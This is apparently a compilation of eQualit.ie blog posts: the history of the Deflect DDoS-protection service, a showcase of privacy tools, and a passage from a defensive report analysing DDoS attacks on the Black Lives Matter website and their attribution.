After several months of further testing, deliberation and consultation with our funders, we decided to abandon the initiative to include voluntary network resources, in favour of continuing the existing mitigation platform and improving its services for clients. As attack mitigation became routine and Deflect successfully defended its clients from relentless DDoS offensives, the team began to look at the impunity currently enjoyed by those launching the attacks. Beginning with a case of a Vietnamese independent media website targeted by bots originating from a state-regulated and controlled Vietnamese ISP, we understood that a story could be extracted from the forensic trail of an attack, that may contain evidence of motivation, method and provenance. If this story could be told, it would give huge advocacy power to the target and begin to peel away at the anonymity enjoyed by its organizers. The cost for attacking Deflectees would raise as exposure and media attention around the event upended the attackers’ goals.
We began to develop an infrastructure that would capture a statistically relevant segment of an attack. Data analysis was achieved through machine-led technology for profiling and classifying malicious actors on our network, visualization tools for human-led investigation and cooperation with peer organizations for tracing activity in our respective networks. This effort became Deflect Labs and in its first twelve months we published three detailed reports covering a series of incidents targeting websites protected by Deflect, exposing their methodology and profiling their networks. Doing some open source intelligence and in collaboration with website staff, we identified a story in each attack exposing possible motivations and identity of the attackers. Following publication and media attention created by these reports, attacks against one of the websites reduced significantly and ceased altogether for the other one.

Bot behavior follows a certain pattern inside the seven dimensional space create by Bothound analytics
Challenges
Many difficulties and problems could be expected with running a high-impact, 24/7 security service for several million daily readers. Fatigue, lack of time for developing new features, round-the-clock emergency coverage and numerous instances of high-stress situations led to burnout and staff turnover. The resources invested in the Distributed Deflect model set back development considerably for other project ambitions.
At around the same time as Deflect was gaining popularity, free mitigation offerings from Cloudflare and Google were introduced in tandem with outreach campaigns targeting independent media and human rights organizations. This led to more options for civil society organizations seeking website protection but made it harder for us to attract the expected number of websites. We started a campaign to define differences in our distinctive approaches to client eligibility, respect for their privacy and clear terms of service, trying a variety of communications and outreach strategies. We were disappointed nonetheless to not have received more support from within our community of peers, as open source solutions and data ownership did not figure highly as criteria for NGOs and media when selecting mitigation options.
… we carry on
Deflect continues to operate and innovate, gradually growing and solidifying. Our ongoing ambitions include offering our clients broader hosting options and coming up with standards and systems for responsible data sharing among like-minded ISPs and mitigation providers. Look out for pleasant graphic user interfaces in our control panels and documentation platforms. We are also prototyping several different approaches to generating revenue in order to sustain the project for the foreseeable future. The goal is to get better without losing track of what we came here to do in the first place. As always, we are here to support our clients’ mission and their right to free expression. We are heartened by their feedback and testimonials.
Deflect Labs reporting
Deflect Labs Report #6 – Phishing and Web Attacks Targeting Uzbek activists
On the 16th of November 2018, we identified a large attack against several websites protected by Deflect. This attack used several professional security audit tools like NetSparker and WPScan to scan the websites eltuz.com and centre1.com.
Deflect Labs Report #5 – Baskerville
In this report, we look at the performance of the Deflect Labs’ new anomaly detection tool, Baskerville, in identifying a selection of the attacks seen on the Deflect platform during the last year.
News from Deflect Labs: DDoS attacks against Caucasian Knot
The Caucasian Knot website joined Deflect on the 19th of October, under the barrel of a massive DDoS attack that had knocked their servers offline. Deflect logged over 7, 700, 000 queries to / on www.kavkaz-uzel.eu between 11h am and 3pm. This was by far the largest DDoS attack we have seen on Deflect in 2018.
Deflect Labs report #4 – anatomy of a booter
On the 2nd of November 2018, we identified a DDoS attack against the Deflect-protected website www.btselem.org. B’Tselem is an Israeli non-profit organisation striving to end Israel’s occupation of the Palestinian territories. This attack is one of seventeen that we identified targeting the B’Tselem website in 2018.
News From Deflect Labs: Botnet Targeting WordPress Websites
We identified traffic from thousands of IPs trying to brute-force WordPress websites protected by Deflect using the same user-agent since September 2017, and confirmed that it is a large scale campaign against WordPress websites coming from a botnet, comprised mostly of systems in China.
News From Deflect Labs: DDoS attacks against Vietnamese Civil Society
We have been protecting two Vietnamese websites, viettan.org and baotiengdan.com on the Deflect platform. Over the past several months, we have seen a significant increase of DDoS attacks against these two websites.
Deflect Labs report #3 – blacklivesmatter.com
This report covers attacks between April 29th and October 15th, 2016. Over this seven-month period, we recorded more than a hundred separate denial-of-service incidents against the official Black Lives Matter website.
Deflect Labs report #2 – bdsmovement.net
This report covers attacks between February 1st and March 31st, 2016 of six discovered incidents targeting the bdsmovement.net website, including methods of attack, identified botnets and their characteristics.
Deflect Labs report # 1 – kotsubynske.com.ua
This report covers attacks against the Kotsubynske independent media news site in Ukraine, in particular during the first two weeks of February 2016. It details the various methods used to bring down the website via distributed denial of service attacks. The attacks were not successful.
Digital security intro
“Malicious apps, theft, spam, cyber stalking, censorship, surveillance. There are no foolproof answers to risk online. But there is advice to help.”
Hygiene in the Digital Public Square was created to give that advice. It offers guidelines on email, social networks, computers, data, identity and location, phones and more. For example, if a user clicks on “Access to the web” they see a brief introduction to security issues with websites and then can choose between three specific scenarios – connecting to a website anonymously, figuring out why a website is unreachable, or connecting to a website securely. Choosing one of the options brings up advice on how to achieve the goal and links to online tools that might help.
eQualit.ie lead the editorial process and information design for this ‘choose your own adventure’ guide on introducing the reader to the world of digital security reference materials. The premise was that most readers do not know where to start seeking answers to their digital security questions. By asking a series of iterative questions, the guide will eventually narrow down the selection of what the reader is actually asking about, and guide them to the correct online reference source. Additional translations are available on the EQ Learn Wiki
IFF Tech&Tools Showcase 2017 – #12 Zifra
Zifra is a building a memory card with state-of-the-art encryption capabilities. Not only does it encrypt, but it also hides the files so that they become invisible to prying eyes. Two guiding principles in Zifra’s development are openness and user-friendliness. Verified open source code is used for crucial parts of the solution and Zifra’s technology will be available to the FOSS community to the largest possible extent.
Zifra’s technology can empower journalists in oppressive environments and strengthen source protection. By using hardware-based security that encrypts on-the-fly, any recording is safe from the moment of creation. Encryption cannot solve all the problems in oppressive environments. However, it can always provide important protection for sources or in situations where equipment is being seized and searched, making sure that the story gets out.
Zifra puts user-friendly, state-of-the-art crypto in the hands of journalists, activists and any individual who needs it. The project combines knowledge and experiences from technologists and human rights defenders to build the best possible solution. The product will be relatively affordable and easy to use, making hardware based cryptography much more accessible to anyone in need.
IFF Tech&Tools Showcase 2017 – #11 Z.cash
Freedom of expression comes in many forms. One of them is the ability to send value to another person or business regardless of location or intent. Current financial privacy models are based on centralized systems which historically limit inclusion to the global market and are susceptible to compromise and potentially unlawful subpoenas, as highlighted in a recent lawsuit regarding surveillance on donors to Barrett Brown’s legal defense fund.
Bitcoin was the first step in opening up opportunities for the unbanked all around the world but has little to offer in terms of user privacy. Launched on October 28, 2016, Zcash is the first open, permissionless financial system employing zero-knowledge security, allowing users and businesses to manage their own funds and maintain control over who sees them.
Zcash is a fork of Bitcoin with privacy improvements based on advanced zero-knowledge cryptography. Users have the ability to encrypt transaction data like sender, receiver, amount and a memo field before being stored in the Zcash blockchain. The zero-knowledge implementation, specifically zk-SNARKs (zero-knowledge Succinct Non-interactive ARguments of Knowledge) allows nodes in the decentralized network to verify transactions without knowing the data itself. Anyone in the world can use Zcash to make private payments by submitting transactions to the decentralized network of Zcash nodes.
The team of scientists, engineers and advisors includes all of the authors of the Zerocash protocol, most of the creators of the Zerocoin protocol, and leading researchers of zk-SNARKs themselves.
The team of Z.cash believes that personal privacy is necessary for core human values like dignity, intimacy, and morality. The goal is to make Z.cash the premier platform for commerce – secure, borderless, and available equally to every person on our planet.
IFF Tech&Tools Showcase 2017 – #10 Wire
Wire is a secure, end-to-end encrypted messenger. It’s open source, works on phones, tablets and computers, supports up to 7 devices per account, and doesn’t require a phone number to register. Wire is headquartered in Switzerland with servers in the EU.Wire started with an idea that people need and deserve a privacy-focused messenger that wasn’t just secure but also a pleasure to use. Something that would work on all of their devices, be easy to use for people with different technical expertise, and have transparency at its core.
In the first 2 years of its life Wire has been heads down getting the technology and product right – from end-to-end encryption to multi-device support, to video calls and all the features one would expect from a modern messenger.
Ever since the Wire team introduced full end-to-end encryption and open sourced the client code (with server code to be opened later this month) there has been an increasing interest from journalists, human rights activists, security trainers and so on towards the app.
The combination of rich feature set, Wire’s jurisdiction and privacy features – option to sign up with email, @username to connect with others, strong Privacy Policy – is clearly working. Upcoming open sourcing of the server code makes hosting a private Wire network a possibility and the team is exploring ways to support federation in the future. The developers have also opened up Wire for end-to-end encrypted integrations via their bot API (dev.wire.com).
IFF Tech&Tools Showcase 2017 – #9 Toosheh
52% of the world population does not have access to any form of internet. 80% of the world doesn’t have access to an internet that is 100% uncensored. Toosheh is an innovation that can provide access to free data to a lot of people with a limited or no internet access all over the world with the lowest possible cost. What is needed is just a common TV satellite dish.
Toosheh – “knapsack” in Persian – uses datacasting technology to distribute content that would otherwise be inaccessible to people in Iran and the neighboring countries. Using their already installed TV satellite dish, users can access up to 8 GB of information daily, including educational and training materials, news articles, entertainment, movies, and rapid alerts in the event of a natural disaster. In a region where internet access is severely limited due to infrastructure, price, and government restrictions, Toosheh provides an immersive “bundle” that allows users to engage in worldwide conversations – all at no cost and a data transfer rate of 1 GB an hour.
IFF Tech&Tools Showcase 2017 – #8 pretty Easy privacy (p≡p)
p≡p stands for pretty Easy privacy. The idea is to make end-to-end cryptography accessible to everyone by automatizing all steps usually taught to users at CryptoPartys, starting from OpenPGP encryption for email and then including chat communication channels like XMPP+OTR.
p≡p end user software comes along with a cloudless (peer-to-peer) synchronization protocol allowing users to read their messages across their devices, and the ultimate goal is to route all messages through GNUnet, a secure peer-to-peer framework, which does not just protect message contents, but also metadata.
At the moment p≡p can be used on Android and Outlook, and soon it will be available for iOS and Enigmail too. It supports multiple programming languages and environments and will provide easy access to multiple crypto technologies through an abstract API that does not require application developers to have in-depth cryptographic knowledge.
p≡p is open source. Its core parts are owned by the Swiss-based p≡p foundation and held under the GNU GPL v3 license alongside with the p≡p trademarks. The foundation is run by privacy activists from Germany and Switzerland. You can view the source code for Android here (CAcert) and the source code for Outlook here (CAcert).
IFF Tech&Tools Showcase 2017 – #7 Passbolt
Passbolt is an open source password manager built for collaboration. It allows teams to securely share and store credentials – like the wifi password of their office, their organisation’s Twitter handle or the administrator password of their router.
It’s 2017 and the most popular passwords are still “123456” and “azerty”. Most people still reuse passwords in multiple systems, even at work. Poor password management is one of the biggest information security threats every organization faces.
Most web-based password managers are proprietary and based in the USA. While these passwords managers providers cannot see your passwords, most still have access to metadata like which websites you log into and what type of credit card you use. Most of the time you cannot host their solution behind a firewall of your own at a reasonable cost.
The team behind Passbolt believes that people should not have to choose between freedom, security and ease of use. Passbolt is different from the other password managers because it is designed for collaboration, web-based and open source. It respects privacy and users are in full control of your data.
Because passbolt encryption is based on the OpenPGP standard, the solution also integrates well with existing tools such as email clients and command line tools. The Restful API will allow building an ecosystem of desktop and mobile clients, as well as integration with other authentication and user management systems.
Short-term plans includes the release of the Groups functionality designed in collaboration with community, as well as the development of new features as selected by the early adopters. You can learn more about the roadmap on the website.
IFF Tech&Tools Showcase 2017 – #6 Paskoocheh
Due to heavy information controls, Iranians face significant challenges when attempting to access the Internet. In addition, popular Iranian app markets such as Cafe Bazaar are not allowed to distribute any circumvention tools, and many tool developers over-comply with sanctions by not making their tools available to Iranians. Paskoocheh is a response to these problems.
Launched on July 1st, 2016, Paskoocheh is an open source app store (available on the web and as an Android app) developed by the ASL19 team. Paskoocheh curates and provides user support for privacy, circumvention, and anonymity tools, and in February 2017 it reached 850,000 download requests.
Anticipating that Paskoocheh would be blocked in Iran, ASL19 created alternative censorship-resistant channels to facilitate uninterrupted access to our tools. Users can request tool downloads from the project’s email or Telegram bots if they aren’t able to access the official website.
IFF Tech&Tools Showcase 2017 – #5 Gridsync
Gridsync is an open source, cross-platform desktop application and graphical user interface for Tahoe-LAFS, the Least Authority File Store.
Tahoe-LAFS’s unique design offers a number of highly-desirable features for users that require secure and reliable cloud storage: its “provider-independent” security model ensures that storage service providers cannot read or alter the data of their users, while its built-in erasure coding and decentralized “grid” architecture ensures the possibility of data recovery even in the event that some storage servers fail or are taken over by an attacker.
Although Tahoe-LAFS has provided secure, decentralized, and fault-tolerant cloud storage for years, it has historically been difficult for non-technical users to install, configure, and use, requiring that users install the application from source, edit configuration files by hand, and utilize a command-line interface for common operations – the sum of which makes Tahoe-LAFS inaccessible to the vast majority of users at risk.
Gridsync Least Authority’s forthcoming, open source, graphical user interface for Tahoe-LAFS aims to ameliorate these issues and make private, decentralized cloud storage more accessible and easy for everyone. By providing a streamlined setup procedure (based on cryptographically secure, one-time-use, human-pronounceable “invite codes”) and a simplified user interface for performing common tasks (like synchronizing local folders), users of Gridsync can leverage Tahoe-LAFS’s excellent security and durability properties without requiring the extensive technical knowledge typically demanded of Tahoe-LAFS users.
Gridsync thus aims to fulfill the needs currently served by other, proprietary “cloud” storage services and file synchronization utilities (such as Dropbox and BitTorrent Sync), but without demanding any sacrifice of the user’s privacy or freedom. Accordingly, Gridsync is developed under the principle that secure file storage should be freely available to everyone.
Much of the project’s current development progress is owing to attendees of last year’s Internet Freedom Festival who, over a period spanning two days, collaborated on features and designs that are now present in the application.
IFF Tech&Tools Showcase 2017 – #4 Coral Project Talk
Online comments are broken: managing interactions with readers can be so challenging that many newsrooms are closing comments. This may be a way of saving on resources, but also isolates journalists from their readers.
The Coral Project – a project focused on the needs of community journalists founded by Mozilla, The New York Times, and The Washington Post – is trying to solve the problem with a series of tools. Among these, Talk can be used by media outlets and independent journalists to embed and manage comments in their articles.
Free, open source and easy to install, Talk can be used in any website and lets authors add a comment thread to different posts, moderate discussions and create a safer, smarter environment where users can keep interacting with journalists, and a more diverse and inclusive media landscape can arise.
IFF Tech&Tools Showcase 2017 – #3 Certbot
In a nutshell, Certbot is a tool for getting certificates from the Let’s Encrypt certificate authority (CA) and configuring your web server to encrypt users’ connections to your website with Let’s Encrypt certificates.
But there’s more to it: Certbot is an easy-to-use automatic client that fetches and deploys SSL/TLS certificates for your webserver. Developed by EFF and others as a client for the Let’s Encrypt certificate authority, Certbot is the most extensive client, will also work with any other CAs that support the ACME protocol, and can automatically configure your webserver to start serving over HTTPS immediately.
Certbot can provide easy set up of HTTPS for most websites. This allows a website to be safe from man-in-the-middle from malicious captive portals or ISPs, and hides the contents of the visited sites from anyone between you and the site. To see what information HTTPS protects check out this useful infographic.
Certbot is part of EFF’s larger effort to encrypt the entire Internet. Websites need to use HTTPS to secure the web. Along with HTTPS Everywhere, Certbot aims to build a network that is more structurally private, safe, and protected against censorship. So far Let’s Encrypt has 30 million certificates in circulation, and the majority, 51%, of page loads are done of HTTPS – but we still have a ways to go before we can see our dream of an entirely encrypted web.
IFF Tech&Tools Showcase 2017 – #2 Bitmask
Bitmask is an open source desktop app that aims to be an intuitive and easy-to-use client for VPN and Encrypted Email.
Bitmask is a project developed by LEAP, a non-profit dedicated to giving all internet users access to secure communication, with a focus on making encryption technology easy to use and widely available. LEAP is trying to make it possible for any service provider to easily deploy secure services and for people to use these services without needing to learn new software or change their behavior.
This week LEAP will be launching Bitmask 0.9.5, with a focus on the Encrypted Email capability. The goal is to lower significantly the access barrier and contribute to make mass adoption of encrypted email a reality in the short term. Since email is the only existing universal and open protocol for asynchronous communications, LEAP aims to improve the adoption of encrypted communications, and in particular encrypted email. Encrypting this already existing mean of communication seems a prerequisite for furthering the resistance to pervasive surveillance, and is addressing the current needs of millions of persons that exchange sensitive information over email in clear text every day.
PGP-encrypted email has been traditionally posed as the de-facto standard for securing email, but the usability factor has become a deep obstacle for its adoption. LEAP wants to change that, together with other modern efforts to improve the status of encrypted email.
Like free speech, the right to whisper is an necessary precondition for a free society. Without it, civil society and political freedom become impossible. As the importance of digital communication for civic participation increases, so does the importance of the ability to digitally whisper. LEAP is devoted to making the ability to whisper available to all internet users.
Bitmask Encrypted Email does opportunistic mail encryption, with transparent OpenPGP key discovery and management. It exposes a local IMAP and SMTP encrypting proxy so that any mail is automatically encrypted, with the ability of using any Mail User Agent (like Thunderbird) against the service. Bitmask also ships a modern web interface to access your encrypted mail locally.
IFF Tech&Tools Showcase 2017 – #1 Amnesty Decoders
Amnesty Decoders is an initiative by Amnesty International born out of a desire to inspire a new generation of digital activists to contribute in real time to human rights research. With this project, Amnesty started building a community of tens of thousands of volunteers who are helping the organisation turn mountains of messy data into structured evidence of human rights violations.
Human rights researchers have to process on a regular basis large volumes of open source intelligence such as videos, satellite images, text documents, scanned PDF, social media reports, images, etc. Organisations working in the field are simply not equipped to process this information, and produce the sound and actionable research that sustains activism.
This tool marks a fundamental shift in human rights research – and gives anyone with internet access the chance to help expose some of the world’s gravest injustices.
Since the launch of the Amnesty Decoders platform, over 45,000 digital volunteers from 150 countries contributed to 3 projects, supporting human rights research by processing over 1.3 million tasks, “decoding” documents and satellite images. The volunteers sifted thousands of hours’ worth of data, dedicating the equivalent of a full time person working 8 years (12,900 hours), helping Amnesty understand how it can improve efficiency of Urgent Action campaigns, identify villages at risk of attacks in remote areas of Darfur and pinpointing villages that were recently destroyed.
Check out the latest Decoders project here.
Distributed Denial of Women – a general strike
We are calling on all women and non-binary people to stand in solidarity and pledge to stay offline, organize or join public gatherings, or stay home in protest of being constantly overlooked, undervalued, underpaid, and downright attacked for daring to demand basic dignity and respect.
Who bytes your bits? – digital security training in Toronto
On the 9th February eQualit.ie’s director Dmitri Vitaliev will lead a digital security training for high-risk journalism hosted by journalist Susana Ferreira as part of #OffAssignment Toronto, a series of workshops and talks for freelance journalists and independent media-makers in Toronto, and organized with the support of CJFE at the DAIS Tkaronto Gallery in Toronto from 6:00 PM to 9:00 PM EST.
If you document or investigate sensitive subjects, knowing how to protect your contacts, your data, and your communications is crucial.
The training will focus on the following topics:
- Introduction: Defining risk in the digital age
- Network surveillance and profiling
- Introductions to secure communications
- Standard disk encryption options for your computer and phone
IFF 2017 – Tools & Tech Showcase
IFF – Tools & Tech Showcase
We have dedicated a post to each of the presented projects: click the icons to read about each tool.
Amnesty Decoders: an initiative by Amnesty International born out of a desire to inspire a new generation of digital activists to contribute in real time to human rights research.
Coral Project: a project focused on the needs of community journalists with the goal of fixing the problem of comments.
Passbolt: an open source password manager built for collaboration.
Wire: a secure, end-to-end encrypted messenger headquartered in Switzerland with servers in the EU.
Bitmask: an intuitive and easy-to-use client for VPN and Encrypted Email.
Gridsync: an open source, cross-platform desktop application and graphical user interface for secure storage based on Tahoe-LAFS.
p≡p: a project to make end-to-end cryptography accessible to everyone by automatizing all steps usually taught to users at CryptoPartys.
Zcash: the first open, permissionless financial system employing zero-knowledge security, allowing users and businesses to manage their own funds and maintain control over who sees them.
Certbot: a tool for getting certificates from the Let’s Encrypt certificate authority (CA) and configuring your web server to encrypt users’ connections to your website.
Paskoocheh: an an open source app store that overcomes many problems with downloading apps in Iran.
Toosheh: a tool that provides access to free data through a common TV satellite dish when internet access is blocked.
Zifra: a memory card with state-of-the-art encryption capabilities..
Deflect in 2016 – an overview
In 2016, Deflect set some records and helped defend online voices against some record breaking attacks. Throughout the year, Deflect served a bit less than 2% of the population connected to the Internet in 2016, published 3 DDoS analytic reports, mitigated the strongest DDoS attack that ever targeted our network, renewed its funding and began to look for new revenue-generating opportunities, and added some excellent people to the team, including more sysops to offer 24/7 support and a business development manager to make sure that our infrastructure will keep existing also in the long term.
In 12 months, the Deflect network received 8.7 billion hits from 64.4 million users. At the same time, Deflect mitigation tools banned 259,514 unique bot IPs, scoring 6.3 million banning events. Visitors of Deflected websites originated primarily from Ukraine (41.13%), Mexico (23.24%), the United States (19.94%), the Russian Federation (7.98%), and Turkey (7.72%).
In March we published the first Deflect Labs report, covering attacks against Kotsubynske, a Ukrainian independent media outlet battling corruption at the local council. This was a first test of the software and infrastructure we had developed over six months. As we would find out later, Deflect was pivotal in making sure that one of the directors of Kotsubynske got re-elected to his town council to continue asking questions and weeding out the truth. The group’s efforts are now being replicated in a dozen different towns across Ukraine. It confirmed our initial hypothesis turning the tables on our clients’ adversaries by shining a light on their methods and provenance, and improving advocacy for the target website.
In April we released the world’s first free, secure and open source WordPress hosting framework, called eQPress and available for free to any group that meets Deflect’s eligibility criteria. In another moment of inspiration, we compiled our sysadmin knowledge into a set of Ansible recipes, allowing anyone to provision a secure communications server, in a project called Caislean.
In June Deflect Labs published its second report, covering attacks against the BDS movement and correlating the behaviour of a particular botnet to incidents involving other organizations working in the region. As could be expected, the topic of the Israel-Palestine conflict generated a lot of media coverage, which helped promote the ideas and tools proposed by the project.
In late June, the Deflect project received a much needed funding top-up, allowing us to keep doing our work and further improve our infrastructure and tool set. This time we focused on usability: starting in late summer and throughout the autumn, the Deflect Dashboard underwent a major overhaul, including automation of processes, a streamlining of communications with users, new statistics in the Deflect Dashboard, and a new TLS/SSL system that allows us to create Let’s Encrypt certificates to secure connections to Deflected websites, while our users can keep their server certificates private.
In late September the team gathered in the mountains of Quebec for a company retreat. During this week people who are normally scattered all over the planet got to meet each other in person, relax together, refine our workplan and discuss strategies. One of the results of the retreat we are particularly proud of is the final version of the Deflect Terms of Service and Privacy Notice.
In October Richard, our technical project manager, presented Deflect at the Freedom Online Coalition, outlining Deflect’s positive impact on the work of civil society.
Six months of research and analytic work finally resulted in the publication of our third and most detailed Deflect Labs report covering attacks against the Black Lives Matter movement. Published on the 13th December, the report was covered by a feature in Ars Technica and articles in other media. This coincided with the release of our botnet behavioural classification library, Bothound. We will follow up with a set of standards for responsible data sharing among mitigation providers in 2017.
The challenges in the sphere of web security are never-ending, and last year we saw DDoS attacks grow stronger and stronger, reaching an unprecedented peak of 1.2 terabits per second and taking down important web services in entire world regions. But as Deflect Labs’ 3rd report shows, DDoS attacks don’t need to be huge or to rely on advanced techniques to be successful – silencing online voices has become so easy and cheap that Brian Krebs is talking about a “democratization of censorship”. To fight this alarming trend, and safeguard freedom of speech, we need to join forces with as many actors as possible within the civil society and the community of web security and mitigation experts. Creating a wide network defending a free internet, and sharing resources to offer a better protection is our hope for this year. Get in touch if you’d like to contribute!
Deflect Stats December 2016
In December 2016 the Deflect network recorded a slight increase in the number of total hits as compared to the previous month, with a comparable number of unique visitors and banning events. Overall, our edges served 635.4 million pages to 9.6 million unique visitors and banned 36,681 bots.
The following pie charts offer some more details on Deflect’s cache response and our visitors’ operating systems.

From what we can see in the pie chart on visitors’ operating systems, mobile devices are getting established as web browsing tools. In December 44.79% of our visitors were using a mobile device and 44.17% were using a pc. By the way, 6.67% of our visitors are still using Windows XP although its support has ended.
December attacks
In December the Deflect network mitigated automatically all DDoS attempts targeting deflected websites, including a couple of stronger incidents on the 14th and the 24th.
Let’s have a closer look at December’s DoS incidents starting from this graph, which shows that “WordPress” is losing favour among DDoSers and botherders as a user agent name, while “Firefox”, “Chrome” and “Safari” are becoming more frequent.
Nevertheless, we can see a spike in “WordPress” user agents in the graph on banned unique IPs, probably suggesting that the DDoS attempt on the 24th December was using a WordPress Pingback reflective attack.
A closer look at the incidents recorded on the 14th and 24th December explains why the first is more visible in the graph on banning events, while the second emerges especially in the graph on banned unique IPs:
Deflect Labs Report #3 – 3D rendering
Botnet attack analysis of Deflect protected website blacklivesmatter.com
Seamus Tuohy and eQualit.ie
This report covers attacks between April 29th and October 15th, 2016. Over this seven-month period, we recorded more than a hundred separate Denial of Service incidents against the official Black Lives Matter website. Our analysis shows a variety of technical methods used in attempts to bring down this website and the characterization of these attacks point to a “mob” mentality of malicious actors jumping on board in response to callouts made on social media and covert channels. Our reporting highlights the usage of no-questions-asked-hosting and booter services used by malicious actors to carry out these attacks. We describe the ever growing trend of Internet vandals searching for a little bit of infamy, launch denial of service attacks against the Black Lives Matter (BLM) website. Our analysis documented attacks that could be accomplished for as little as $1 and requiring basic technical skill, with access to public documentation and malicious software within easy reach. Some of the larger attacks against BLM did not rely upon huge infrastructure and were able to generate millions of connections simply by “reflecting” of legitimate WordPress and Joomla sites. We compare public attribution for some of the attacks with the coming through our networks, and present the involvement of purported members of the Ghost Squad hacking team in these events.
Contents:
Introduction
“Black Lives Matter, a May First/People Link member that is supported by the Design Action Collective, is a central organization in the response movement against police abuse, brutality and misconduct.” The BLM website has been protected by Deflect since April 15th 2016, following a spate of DDoS and hacking attacks.
In early July we published a prima facie bulletin expecting to write a comprehensive report of the attacks soon after. Since then the BLM website faced an increasing number of sizable attacks that we decided to include in our analysis and delayed publication. This report will explore these attacks, correlating open source research and publicly stated attribution with what we saw in the data.
The Deflect Labs infrastructure allows us to capture, process and profile each attack, analyzing unique incidents and intersecting findings with a database of profiled botnets. We define the parameters for anomalous behavior on the network and then group (“cluster”) malicious IPs into botnets using unsupervised machine learning algorithms.
Attacks & attribution
As a DDoS mitigation solution for blacklivesmatter.com, Deflect has access to all legitimate and malicious requests made to this website. However in almost all cases, attacks come via infected machines or as a reflection attack from unsuspecting websites. A semi-experienced attacker knows how to obfuscate and disguise their traces on the Internet. It is therefore incredibly difficult to attribute an action to a particular person or IP address with confidence. We rely on our analytic tooling, peers in the mitigation industry and social media research to test our hypothesis. Assumptions arising out of OSINT are then verified against the data on our systems and vice versa.
Technical analysis and social media research indicated that actions against the BLM website were launched by multiple attackers frequently acting in concert. Some methods, like Joomla & WordPress reflection attacks, appear to have been coordinated, whilst in other cases it was clear that many actors jumped on the bandwagon of a more powerful attack to claim some of the credit. These small, loosely organized mobs appear minutes to hours after the start of the original attack and lob a hodge-podge of various attack methods, often to no effect. These actions are often accompanied by a flurry of queries from various website downtime monitoring solutions, as attackers try to collect trophies for their participation in the mob. Furthermore, we noticed a sophisticated actor who was able to generate malicious traffic on a level beyond anyone else that we documented targeting BLM. Using bulletproof hosting to coordinate their attacks, they did not go to great lengths to obfuscate their identity, creating instead a complicated web of social media accounts, possibly fake public attribution claim and general intrigue about their motivations and purpose.
The ‘Ghost Squad’
The first, and only, publicly attributed attacks began in late April, as s1iege, a professed member of the Ghost Squad hacking collective, began tweeting screenshots showing site defacement and reports from website up-time checkers that the BLM site was no longer reachable. The action was part of #OPAllLivesMatter, likely in response to the #AllLivesMatter slogan (and then hashtag) created in 2015. On May 2nd, 2016, a YouTube video uploaded by @anonymous_exposes_racism contained a warning from a group identifying themselves as Anonymous to leaders of the Black Lives Matter movement, asking them to also denounce anti-white racism.
This first set of attacks against BLM, beginning on April 29th, lasted a mere 30 minutes. They came from six IP addresses and generated a little under 15,000 connections. A single method of attack and very few resources were brought into play, making this small action only temporarily effective at best. That evening five different IP addresses conducted another attack against the BLM website that topped off at over 158,000 connections over a period of an hour.
During this attack @_s1ege posted Twitter comments taking credit. Alongside photos that showed the Black Lives Matter website had been temporarily taken down by this attack, s1ege posted a photo of the software he was using, “BlackHorizon”.
BlackHorizon is a clone of a piece of HTTP DOS software called GoldenEye, which was written by Jan Seidl in 2014. It was itself an expansion on the 2012 HULK project by Barry Shteiman. Unlike Seidl’s thoughtful adaptation and expansion of HULK, the BlackHorizon codebase mainly changes the ASCII art and the author’s name. When examined, it was clear that the functional components of the code were almost entirely unaltered from GoldenEye.
Several media publications rushed to interview s1ege with the @ghostsquadhack Twitter and GhostSquadHackers Facebook account referencing these publications. Around 30 minutes after the second attack Waqas Amir published an article on HackRead describing both incidents alongside his conversation with a GSH member. Later that evening one member of the GSH came back reusing an earlier bot and creating an attack that generated well under 700 connections, before giving up after less than 20 minutes.
Shortly after the tweets and HackRead publication, we witnessed an increase in attack frequency and variety. Only a portion of these had a similar behavioural profile on the network to those attributed by s1ege. The attackers were using well known software and may have called out to others on the Internet to follow suit. On May 10th @_s1ege announces @bannedoffline as a new member in the Ghost Squad collective and two days later stops tweeting from this account altogether.
Maskirovka
BLM began to face larger scale attacks on May 9th. The first one lasted a little over 90 minutes and consisted of 1,022,981 connections from legitimate WordPress websites. This was not the first “WordPress pingback” attack against the BLM website, but an indication that we were beginning to face adversaries prepared to extend much greater resources than before.The level of severity and aggression continued to mount and on July 9th we witnessed a WordPress pingback attack that generated over 34 million connections to BLM in a single day. The attackers did not seem to be interested in obfuscating their provenance, allowing us to track these activities over the next few months. The attacks were coordinated from machines rented from a “bulletproof” provider promising no-questions-asked offshore servers for rent. The incidents associated with these attacks were the largest faced by BLM during the reporting period.
On July 25th we received a subscription for Deflect protection from a ‘John Smith’ asking us to enlist http://ghostsquadhackers.org We traced this request and further conversation with this user to @bannedoffline on Twitter and Facebook as well as the owner of the following domains: ghostantiddos.com; ghostsquadsecurity.com; bannedoffline.xyz; www.btcsetmefree.org; among others.
Our analysis of actions run from the ‘bulletproof’ hosting provider identified several IP addresses that were used for command and control. These addresses were correlated by a peer mitigation provider who had dared @bannedoffline on a hackers forum to DDoS them and recorded the resulting activity. Two IP addresses, one belonging to the DMZhosting provider mentioned further on in this report and a Digital Ocean machine were identified in our individual records – and correlated to eight separate incidents in our study.
- 191.96.249.80 Dmzhost Limited https://dmzhost.co
- 178.62.152.134 DigitalOcean https://www.digitalocean.com
It is hard to say with any certainty why there were no more public attributions for attacks on BLM after the first week of May, considering that the severity and sophistication increased several fold. @bannedoffline deleted all of their social media postings in late September, just before we recorded the biggest attack against the BLM website. Bannedoffline was also linked to a 665gbps attack (the largest attack of its time, before the Mirai botnets) against the ‘Krebs on Security’ website. The Ghost Squad did not attribute nor deny @bannedoffline’s continued participation in their collective. Attacks attributable to bannedoffline and s1ege, who could very well be the same person, made up less than 20% of recorded DDoS activity against BLM.
Technical Analysis Of Attacks
Incidents using a similar attack method were distinguished through an iterative process of identifying possible behavioral characteristics that distinguish one type of attack from others. First we identified combinations of behaviors and feature